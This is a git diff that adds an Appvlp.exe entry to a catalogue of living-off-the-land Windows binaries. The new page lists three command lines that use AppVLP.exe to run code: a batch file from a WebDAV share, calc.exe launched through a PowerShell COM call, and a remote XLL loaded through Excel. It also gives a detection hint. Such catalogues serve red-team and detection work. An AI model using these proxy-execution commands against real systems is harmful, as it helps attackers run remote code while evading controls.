Appvlp.exe

LOLBins.md

@@ -5,6 +5,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
    
 # OS BINARIES
 [Atbroker.exe](OSBinaries/Atbroker.md)    
+[Appvlp.exe](OSBinaries/Appvlp.md)    
 [Bash.exe](OSBinaries/Bash.md)    
 [Bitsadmin.exe](OSBinaries/Bitsadmin.md)    
 [Certutil.exe](OSBinaries/Certutil.md)    

OSBinaries/Appvlp.md

@@ -0,0 +1,35 @@
+## Appvlp.exe
+
+* Functions: Execute
+
+```
+AppVLP.exe \\webdav\calc.bat   
+
+AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe', '', '', 'open', 1)"    
+
+AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"    
+```
+
+Acknowledgements:
+* Will - @moo_hax
+
+Code sample:
+* 
+
+Resources:
+* https://github.com/MoooKitty/Code-Execution
+* https://twitter.com/moo_hax/status/892388990686347264
+
+Full path:
+```
+"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe"
+```
+
+Notes:
+Used by App-V
+
+
+Detection:
+Appvlp.exe spawning other process
+
+